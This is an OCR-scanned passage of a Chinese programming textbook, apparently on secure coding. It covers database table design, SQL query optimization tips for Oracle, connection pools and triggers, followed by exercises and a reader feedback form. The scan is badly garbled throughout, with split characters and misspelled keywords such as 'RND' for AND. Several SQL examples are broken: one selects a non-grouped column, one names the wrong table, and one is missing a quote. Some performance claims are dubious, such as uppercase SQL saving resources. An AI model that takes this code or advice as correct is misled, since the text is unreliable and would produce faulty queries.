实际 上 ,一 个 表 中 的 列 的 个 数 越 少 越 好 。 将 列 数 变 少 , 是 减少 不 必要 的 数据 元 余 的 
重要 手段 。 表 16-3 存储 了 学 生 的 分 数 (假如 学 生 参 加 考试 的 科目 为 语文 、 数 学、 英语 ) 
表 16-3 T_SCORE 
学 号 语文 成 绩 数学 成 绩 英语 成 绩 


该 表 中 ,如 果 增 加 一 门 科目 ,就 要 增加 一 列 , 此 时 其 他 列 就 必须 为 空 。 因 此 ,可 以 利 
用 “ 列 变 行 " 技 术 将 其 转换 成 以 下 两 个 表 , 参 见 表 16-4 和 表 16-5。 
表 16-4 T_SCORE 
学 号 科目 ID 成 ” 绩 


表 16-5 T_COURSE 
科 目 ID 科目 名 称 


T_COURSE 中 的 科目 ID 为 主键 ,在 T_SCORE 中 充当 外 键 。 
7. 计算 的 分 层 均衡 
| 在 有 些 项 目 中 ,如 电信 计 费 系统 ,向 数据 库 中 添加 一 条 记录 之 前 ,需要 进行 一 些 计 
| 算 ( 如 计算 用 户 的 本 月 话费 ,必须 考虑 语音 、 短 信 、 其 他 、 月 租 , 折 扣 、 套 餐 ), 这 些 计 算 较 
， 为 复杂 。 此 时 ,可 以 将 这 些 复杂 计算 交 给 前 端 (编程 ) 去 做 ,然后 人 库 。 毕 竟 数 据 库 语言 
的 逻辑 表达 能 力 有 限 ,复杂 的 计算 可 能 导致 数据 库 对 它 本 职工 作 的 响应 变 得 缓慢 。 


16.4.2 SQL 语句 优化 


| 从 编程 的 角度 讲 , 对 数据 库 的 访问 主要 是 对 数据 库 数据 的 操作 ,如 添加 、 删 除 、 修 
” 改 ,查询 等 。 由 于 添加 ,删除 和 修改 操作 ,主要 还 是 要 基于 查询 ,因此 ,数据 库 访问 上 的 
， 优化 主要 指 查询 上 的 优化 。 一 般 说 来 ,开发 人 员 的 查询 工作 多 用 SQL 语句 来 实现 。 

| 首先 给 出 SQL 查询 语句 的 一 般 格式 : 
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SELECT[ ALL| DISTINCT | TOP] 

{* |talbe. * |[table. Jfield1[AS aliasl][, [table. Jfield2[AS alias2][, …]]} 
FROM tableexpression[, … ][IN externaldatabase] 

[WHERE…] 

[GROUP BY…] 

[HAVING… ] 

[ORDER BY… ] 

[WITH ONNERACCESS OPTION] 


其 中 ,有 些 功能 是 某 些 数据 库 特 有 的 ,如 SQL Server 中 的 TOP,Oracle 的 ROWNUM， 
在 此 特别 说 明 。 

本 节 基 于 ORACLE 数据 库 , 阐 述 一 些 和 SQL 语句 优化 有 关系 的 方案 : 

1. SELECT 子 名 中 能 够 不 使 用 * * ”就 不 使 用 ,尽量 用 列 名 蔡 代 

在 ORACLE 数据 库 中 ,解析 SQL 语句 时 ,会 将 "* ”转换 成 表 中 所 有 的 列 名 ,该 工 
作 意 味 着 另 一 次 查询 ,具有 一 定 的 时 间 耗 费 。 

2. 充分 利用 内 部 函数 来 提高 SQL 语句 的 效率 

很 多 SQL 语句 的 功能 可 以 用 内 部 函数 来 实现 ,内 部 函数 往往 实现 了 优化 ,因此 ,如 
果 能 够 用 内 部 函数 使 用 的 情况 ,尽量 使 用 内 部 函数 。 

3. 在 查询 过 程 中 ,尽量 使 用 表 别 名 (Alias) 

SQL 语句 多 表 查 询 中 ,可 以 不 给 源 表 指 定 别名 ,但 是 推荐 使 用 表 的 别名 ,并 在 每 
个 列 前 加 上 别名 ,减少 解析 时 间 。 当 然 , 这 种 方法 也 能 减少 由 于 列 名 相同 引起 的 
歧义 。 

4. 合理 使 用 过 滤 操 作 子 名 

数据 库 中 ,过 滤 操作 子 句 一 般 有 如 下 几 个 。 

。 ON: 用 于 连接 过 程 中 的 过 滤 。 

。 WHERE: 用 于 对 检索 出 来 的 结果 进行 过 滤 。 

。 HAVING: 用 于 在 有 聚合 函数 的 情况 下 对 检索 结果 进行 过 滤 ,等 等 。 

一 般 情 况 下 ,ON 是 最 先 执行 ,WHERE 次 之 ,HAVING 最 后 。 这 里 给 出 的 建议 ， 
是 ,尽量 一 步 步 缩小 过 滤 的 范围 ,ON、WHERE 和 HAVING 要 有 条 理 地 分 布 在 SQL 
语句 中 。 | 

不 过 ,在 某 些 情况 下 ,如 HAVING 中 有 聚合 函数 进行 计算 的 时 候 , WHERE 子 句 ， 
的 运行 速度 快 于 HAVING, 因 此 ,这 种 场合 ,如 果 能 够 通过 一 些 手 段 使 用 WHERE 子 | 
句 ,就 不 要 用 HAVING 子 句 。 | 

另外 ,要 尽量 减少 GROUP BY 的 范围 ,提高 GROUP BY 语句 的 效率 。 如 果 在 
GROUP BY 中 需要 过 滤 掉 一 些 数据 ,尽量 在 GROUP BY 之 前 用 WHERE 子 句 过 滤 ， 
不 要 在 GROUP BY 之 后 用 HAVING 子 句 过 滤 。 

例如 ,有 一 个 员工 表 如 表 16-6 所 示 。 
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表 16-6 员工 表 
姓 名 岗 位 工 次 
如 下 代码 ,从 员工 表 中 统计 工资 : 
SELECT 姓名 ，AVG( 工 资 ) 
FROM 员工 表 
GROUP BY 岗位 


HAVING 岗位 = ' 管 理 部 门 ' OR 岗位 = 行政 部 门 ' 


该 语句 将 数据 的 过 滤 放 在 GROUP BY 之 后 来 做 ,可 以 改 为 : 


SELECT 姓名 ,AVG( 工 资 ) 

FROM 员工 表 

WHERE 岗位 = ' 管 理 部 门 'OR 岗位 = ' 行 政 部 门 ' 
GROUP BY 岗位 


5. SQL 语句 尽量 大 写 

很 多 数据 库 中 , 遇 到 了 小 写 的 SQL 语句 ,也 会 转换 为 大 写 ,耗费 资源 。 

6. 适当 利用 关联 子 查询 

关联 子 查询 在 查询 过 程 中 ,外 层 查询 和 内 层 查 询 一 起 做 ,记录 量 减少 较 快 , 因 此 ,能 


够 使 用 关联 子 查询 的 场合 ,尽量 使 用 。 


例如 ,有 两 个 表 , 参 见 表 16-7 和 表 16-8。 
表 16-7 学 籍 表 
学 号 姓 名 班 级 号 学 费 状 态 年 龄 


表 16-8 班 级 表 


班 级 号 班 主 任 教 室 


如 下 代码 : 


SELECT 学 号 FROM 学 籍 表 WHERE 年 龄 > 20 
RND 班级 号 IN 

(SELECT 班级 号 FROM 班级 表 

WHERE 班主 任 = ' 唐 云 ) 


因为 要 进行 的 两 次 查询 ,分 别 对 学 籍 表 和 班级 表 进 行 全 表 查 询 ,比较 低 效 ,可 以 改 为 


SELECT 学 号 FROM 学 籍 表 WHERE 年 龄 > 20 
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AND EXISTS 

(SELECT x FROM 班级 号 

WHERE 班级 表 . 班级 号 = 学籍 表 .班级 号 
AND 班主 任 = ' 唐 云 ') 


7. 利用 索引 提高 效率 | 

索引 可 以 用 来 提高 检索 数据 的 效率 ,通过 索引 查询 数据 比 全 表 扫 描 要 快 ,这 几乎 成 
为 一 个 常识 。 | 

关于 索引 的 使 用 ,需要 注意 ,有 些 数 据 库 中 ,如 果 对 索引 列 进行 了 一 些 计算 ,索引 将 
不 被 使 用 , 转 而 进行 全 表 扫描 ,因此 ,要 避免 在 索引 上 使 用 计算 。 例 如 下 列 代码 ,从 工资 
表 中 查找 满足 条 件 的 工资 : 


SELECT … FROM 工资 表 
WHERE 工资 * 12 > 100000 


可 以 改 成 : 


SELECT … FROM 工资 表 
WHERE 工资 > 100000/12 


还 有 很 多 情况 可 能 造成 索引 不 使 用 ,如 : 
。 在 索引 列 上 使 用 NOT; 
。 在 索引 列 上 使 用 函数 ; 
。 在 索引 列 上 使 用 IS NULL, 等 等 。 
读者 可 以 参考 相应 文档 。 
8. 如 果 删 除 整个 表 中 的 内 容 , 可 以 用 TRUNCATE 替代 DELETE 
由 于 在 删除 整个 表 中 内 容 时 ,TRUNCATE 的 性 能 高 于 DELETE, 因 此 推荐 使 用 ; 
但 是 ,如 果 删 除 表 中 的 一 部 分 内 容 , 还 是 要 使 用 DELETE。 
9. 慎 用 UNION 操作 符 
UNION 操作 符 是 将 两 个 结果 集合 并 ,合并 的 结果 中 筛选 掉 重复 记录 ,此 时 会 执行 ， 
排序 运算 ,但 是 有 时 候 , 排 序 运算 不 是 必要 的 ,并 且 查 询 出 来 的 结果 也 不 会 有 重复 记录 ， 
或 者 用 户 并 不 在 意 是 否 有 重复 记录 。 这 种 情况 下 ,可 以 采用 UNION ALL 操作 符 替 代 
UNION ,因为 UNION ALL 操作 并 不 进行 排序 ,只 是 将 两 个 结果 合并 之 后 返回 。 
10. WHERE 后 条 件 顺序 的 考虑 
WHERE 子 句 后 面 有 可 能 通过 多 个 条 件 进行 限制 ,此 时 可 以 搞 清楚 条 件 执行 的 顺 
序 , 将 可 能 筛选 掉 较 多 数据 的 条 件 先 执行 。 
如 下 SQL 语句 (参考 学 籍 表 ) : 


SELECT 学 号 FROM 学 籍 表 
WHERE 学 费 状 态 = ' 未 交 ' 
RND 性 别 = ' 女 ' 


切 软件 安全 实现 一 一 安全 编程 技术 
如 果 未 交 学 费 的 学 生 占据 比例 很 少 ,那么 尽量 让 学 费 状态 二 ' 未 交 ' 这 个 条 件 先 执 
行 ,如 果 数据 库 对 两 个 WHERE 条 件 的 执行 是 从 右 到 左 的 话 ,那么 就 可 以 改 为 : 


SELECT 学 号 FROM 学 籍 表 
WHERE 性 别 = ' 女 ' 
AND 学 费 状态 = ' 未 交 ' 


16.4.3 其 他 优化 


这 里 列举 几 个 其 他 方面 的 优化 。 

1. 大 项 目 中 ,推荐 使 用 数据 库 连 接 池 (Connection Pool) 

由 于 在 数据 库 连 接 建立 的 过 程 中 ,资源 花 销 较 大 ,如 果 一 个 用 户 对 数据 的 一 次 访 
问 ,就 建立 一 个 连接 ,那么 系统 性 能 会 大 大 下 降 ; 但 是 如 果 让 多 个 用 户 共 用 同一 个 连 


。 接 , 又 会 出 现 让 用 户 等 待 的 情况 。 解 决 的 办 法 就 是 让 连接 在 一 定 范围 内 被 多 个 访问 共 


享 ,Connection Pool 对 象 机 制 较 好 地 实现 了 这 一 点 。 

3 提示。 在 Connection Pool 机 制 中 ,服务 器 专门 开展 一 片 内 存 , 称 为 连接 缓冲 池 ， 
当 用 户 访问 时 ,直接 在 缓冲 池 中 获取 一 个 空闲 的 连接 ; 如 果 缓 冲 池 中 没有 空闲 的 连接 ， 
就 建立 一 个 连接 ; 连接 用 完 , 放 回 缓冲 池 中 。 

该 机 制 在 少量 用 户 访问 时 性 能 提升 不 明显 ,但 是 在 大 项 目 中 ,能 够 大 大 地 提高 系统 
的 响应 速度 。 

2. 慎 用 触发 器 

由 于 触发 器 在 每 次 对 数据 库 进行 操作 时 都 会 调用 ,因此 ,不 到 万 不 得 已 ,不 使 用 触 
发 器 。 对 于 表 中 数据 的 一 些 约束 ,尽量 用 表 结 构 级 别 的 描述 完整 性 来 实现 ,而 不 是 用 触 
发 器 实现 ,更 不 要 在 SQL 程序 中 实现 。 

3. 游标 的 使 用 中 ,如 果 游 标 操作 的 数据 较 多 , 那 就 不 要 使 用 


小 结 


本 章 基 于 一 些 流行 的 编程 语言 ,讲解 一 些 编程 技巧 ,包括 数据 优化 、 算 法 优化 ,应 用 


。 优化 等 方面 的 内 容 , 也 讲解 了 数据 库 设计 和 访问 的 优化 。 


应 该 指出 的 是 ,本 章 内 容 只 是 一 些 技巧 的 举例 ,并 不 能 代表 所 有 的 代码 优化 技术 。 
代码 的 优化 有 时 候 是 以 程序 的 可 读 性 甚至 程序 安全 性 为 代价 的 ,在 开发 的 过 程 中 ,一 定 


。 要 权衡 好 两 者 之 间 的 利 凋 关系 ,采用 适当 的 优化 方法 。 


练习 


1. 性 能 优化 在 项 目 运 行 过 程 中 很 重要 。 
(1) 举 出 几 个 代码 性 能 必须 要 优化 的 项 目 例子 。 
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(2) 举 出 几 个 因为 性 能 不 优化 而 引起 系统 安全 隐患 的 例子 。 
2. 代码 性 能 优化 有 时 候 可 能 会 与 程序 可 读 性 发 生 了 矛盾。 
(1) 怎样 平衡 这 个 矛盾 ? 
(2) 什么 情况 下 这 个 平衡 可 能 会 向 某 个 方面 倾斜 ? 优 7 


3. 在 算法 设计 中 ,为 了 程序 性 能 ,有 时 候 需 要 采取 一 定 的 交换 策略 。 | 

(1) 举 出 一 个 “以 空间 换取 时 间 ” 的 例子 。 

(2) 举 出 一 个 “以 时 间 换 取 空间 ”的 例子 。 | 

4. 数据 库 设 计 过 程 中 , 宛 余 一 般 情况 下 是 不 允许 的 ,但 有 时 又 可 以 采用 。 

(1) 什么 情况 下 可 以 设置 元 余 列 ? 举 出 一 个 在 数据 库 设 计时 特意 设置 元 余 列 的 例 
子 并 解释 理由 。 

(2) 怎样 避免 元 余 列 造成 的 负面 影响 ? 

5. 索引 对 查询 性 能 的 提高 很 有 好 处 。 

(1) 查找 相关 文献 ,在 Oracle 中 ,一般 在 什么 样 的 列 上 创建 索引 ? 

(2) 列 出 在 哪些 情况 下 ,Oracle 的 索引 可 能 会 停 用 。 

6. 字符 串 的 池 机 制 实际 上 是 对 字符 串 操 作 的 一 个 优化 。 

(1) 对 . NET 中 字符 串 的 池 机 制 进行 测试 。 

(2) 对 Java 中 的 字符 串 池 机 制 进行 测试 。 

7. 有 时 候 , 功 能 类 似 的 数据 结构 ,底层 实现 可 能 不 同 ,由 此 影响 到 用 户 的 选择 。 

(1) 编写 一 段 线程 同步 不 安全 代码 ,测试 Java 的 ArrayList。 

(2) 用 Vector 进行 测试 。 | 

8. 异常 处 理 中 ,try 块 所 管理 的 范围 对 系统 性 能 有 影响 。 一 般 说 来 ,try 块 内 的 代 | 
码 太 多 ,和 较 少 的 代码 相 比 ,系统 性 能 有 所 下 降 。 | 

(1) try 块 所 管理 的 范围 越 小 越 好 吗 ? 

(2) 对 上 一 题 说 明理 由 。 

9. 享 元 模式 能 够 提高 系统 性 能 。 

(1) 举 出 享 元 模式 在 本 章 以 外 另 一 个 场合 的 应 用 ,并 写 出 代码 。 

(2) 享 元 模式 有 何 劣势 ? 

10. 数据 库 连 接 池 是 一 种 较 好 的 数据 库 访问 方案 。 

(1) 任 选 一 种 服务 器 ,学 会 配置 连接 池 。 

(2) 学 会 连接 池 的 应 用 。 
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很 满意 口 满意 口 一 般 口 不 满意 ”改进 建议 

您 对 本 书 印刷 质量 的 满意 度 : 

很 满意 口 满 意 口 一 般 口 不 满意 ”改进 建议 

您 对 本 书 的 总 体 满意 度 : 


从 语言 质量 角度 看 ” 口 很 满意 口 满意 口 一 般 口 不 满意 
从 科技 含量 角度 看 ” 口 很 满意 口 满意 口 一 般 口 不 满意 
本 书 最 令 您 满意 的 是 : 
指导 明确 口内 容 充实 口 讲解 详尽 口 实 例 丰 富 
您 认为 本 书 在 哪些 地 方 应 进行 修改 ? (可 附 页 


您 希望 本 书 在 哪些 方面 进行 改进 ?〈 可 附 页 ) 


电子 教案 支持 


敬爱 的 教师 : 

为 了 配合 本 课程 的 教学 需要 ， 本 教材 配 有 配套 的 电子 教案 (素材 ) ， 有 需求 的 教师 可 
以 与 我 们 联系 ,我 们 将 向 使 用 本 教材 进行 教学 的 教师 免费 赠送 电子 教案 (素材 ), 希望 有 
助 于 教学 活动 的 开展 。 相 关 信 息 请 拨打 电话 010-62776969 或 发 送 电 子 邮 件 至 jsjjc@tup. 
tsinghua. edu. cn 咨询 ， 也 可 以 到 清华 大 学 出 版 社 主页 (http://www. tup. com. cn 或 http:// 
www. tup. tsinghua. edu. cn) 上 查询 。 


